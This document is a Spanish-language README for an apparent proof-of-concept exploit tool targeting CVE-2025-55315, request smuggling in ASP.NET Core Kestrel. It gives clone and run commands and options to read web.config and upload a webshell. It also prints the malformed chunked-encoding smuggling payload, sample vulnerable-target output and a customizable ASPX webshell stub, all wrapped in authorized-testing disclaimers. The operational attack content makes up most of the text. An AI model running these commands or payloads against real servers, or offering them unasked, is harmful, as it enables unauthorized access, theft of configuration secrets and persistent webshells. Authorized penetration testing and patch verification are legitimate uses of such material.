
Exploit PoC de CVE-2025-55315
Herramienta de explotación de contrabando de solicitudes HTTP para ASP.NET Core Kestrel
¡ESTA HERRAMIENTA ES SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS!
Herramienta profesional de pruebas de penetración para CVE-2025-55315 (vulnerabilidad de contrabando de solicitudes HTTP en ASP.NET Core Kestrel). Esta herramienta está diseñada para el análisis de un único objetivo con capacidades integrales de explotación.
Una vulnerabilidad crítica de contrabando de solicitudes HTTP en el servidor web ASP.NET Core Kestrel (CVSS 9.9/10) que permite a los atacantes:
Versiones afectadas:
# Python 3.7 or higher
python3 --version
# No external dependencies - uses only standard library
# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit
# Make executable
chmod +x cve_2025_55315_PoC.py
python3 cve_2025_55315_PoC.py -t target.com
Esto:
python3 cve_2025_55315_PoC.py -t target.com -e /api/login
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt
python3 cve_2025_55315_PoC.py \
-t target.com \
--read-config \
--upload-shell \
-v \
-o full_report.txt
Escenario: Comprobar si el servidor de producción es vulnerable
python3 cve_2025_55315_PoC.py -t api.mycompany.com
Duración esperada: 30-60 segundos
Escenario: Escaneo integral de endpoints con salida detallada (verbose)
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt
Duración esperada: 2-5 minutos
Escenario: Probar endpoints críticos específicos
python3 cve_2025_55315_PoC.py \
-t api.mycompany.com \
-e /api/payment/process \
-e /api/admin/users \
-e /api/internal/config \
-o critical_endpoints.txt
Escenario: Probar un servidor HTTP interno
python3 cve_2025_55315_PoC.py \
-t internal-api.local \
-p 8080 \
--no-ssl
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
[--no-ssl] [--read-config] [--upload-shell]
[-o OUTPUT] [-v] [--timeout TIMEOUT]
Required Arguments:
-t, --target Target hostname or URL (e.g., target.com)
Optional Arguments:
-p, --port Port number (default: 443 for SSL, 80 for non-SSL)
-e, --endpoint Specific endpoint(s) to test (can be used multiple times)
--no-ssl Disable SSL/HTTPS (use HTTP)
--read-config Attempt to read web.config file
--upload-shell Attempt webshell upload (requires confirmation)
-o, --output Save report to file
-v, --verbose Enable verbose output
--timeout Socket timeout in seconds (default: 10)
-h, --help Show help message
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL
--- Server Information ---
server: Kestrel/8.0.15
kestrel_detected: True
http_version: 1.1
--- VULNERABLE ENDPOINTS (2) ---
✗ /api/login
Details: Request smuggling successful - multiple responses
✗ /api/health
Details: Request smuggling successful - multiple responses
--- SUCCESSFUL EXPLOITS ---
✓ web.config_read via /api/login
Interpretación:
Target: new-api.company.com:443
Vulnerable: NO - SECURE
--- Server Information ---
server: Kestrel/9.0.10
kestrel_detected: True
http_version: 1.1
[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)
✓ No vulnerable endpoints found - target may be patched
Interpretación:
Antes de ejecutar esta herramienta, asegúrese de:
La herramienta explota CVE-2025-55315 mediante una codificación de transferencia fragmentada (chunked) malformada:
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
2;\n ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1 ← This becomes a separate request
Host: target.com
Por qué funciona esto:
\n como terminador de línea → lo procesa como una sola solicitud\n → trata el GET contrabandeado como una solicitud separada| Server Response | Interpretation | Status |
|---|---|---|
400 Bad Request | Kestrel rejected malformed chunk | ✅ Secure (patched) |
Multiple HTTP/1.1 | Two separate responses received | ❌ Vulnerable |
500 or 502 | Internal server error | ⚠️ Likely vulnerable |
Normal 200 OK | Request accepted | ⚠️ Inconclusive |
[ERROR] Connection failed: [Errno 111] Connection refused
Soluciones:
ping target.com--no-ssl[ERROR] Connection failed: certificate verify failed
Solución:
La herramienta ya desactiva la verificación de certificados. Si el problema persiste:
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com
[WARNING] No response - possible timeout
Soluciones:
--timeout 30[WARNING] Upload blocked (forbidden/method not allowed)
Explicación:
Esto es normal: no todos los sistemas vulnerables permiten la carga de archivos.
Aviso de seguridad de Microsoft: https://github.com/dotnet/aspnetcore/issues/64033
Base de datos NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55315
Investigación de Praetorian (recompensa de $10k por bug): https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/
Análisis técnico de Andrew Lock: https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/
Investigación de PortSwigger: https://portswigger.net/web-security/request-smuggling
OWASP: https://owasp.org/www-community/attacks/HTTP_Request_Smuggling
Edite COMMON_ENDPOINTS en el script:
COMMON_ENDPOINTS = [
'/your/custom/endpoint',
'/api/myapp/admin',
# Add your endpoints here
]
Modifique el método upload_webshell():
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
shell_content: str = None):
if not shell_content:
shell_content = '''
<!-- Your custom ASPX webshell here -->
'''
Si encuentra errores o tiene sugerencias:
-v-o debug.txtTHIS TOOL IS PROVIDED "AS IS" FOR EDUCATIONAL AND AUTHORIZED
SECURITY TESTING PURPOSES ONLY.
THE AUTHOR(S):
❌ Do NOT endorse illegal activities
❌ Are NOT responsible for misuse
❌ Are NOT liable for any damages
❌ Do NOT provide legal advice
BY USING THIS TOOL YOU AGREE:
✅ To use only on authorized systems
✅ To accept full legal responsibility
✅ To comply with all applicable laws
✅ To follow ethical hacking principles
UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL!
Esta herramienta fue creada para:
NO para:
Solo para pruebas de seguridad educativas y autorizadas
Esta herramienta se proporciona con fines educativos y para pruebas de seguridad autorizadas. El uso comercial, la redistribución o el uso con fines maliciosos están estrictamente prohibidos.
╔═════════════════════════════════════════════════════════════╗
║ ║
║ USE THIS TOOL RESPONSIBLY AND LEGALLY! ║
║ ║
║ Unauthorized access to computer systems is a CRIME. ║
║ Always obtain written permission before testing. ║
║ Follow responsible disclosure practices. ║
║ ║
║ Happy (Legal) Hacking! ║
║ ║
╚═════════════════════════════════════════════════════════════╝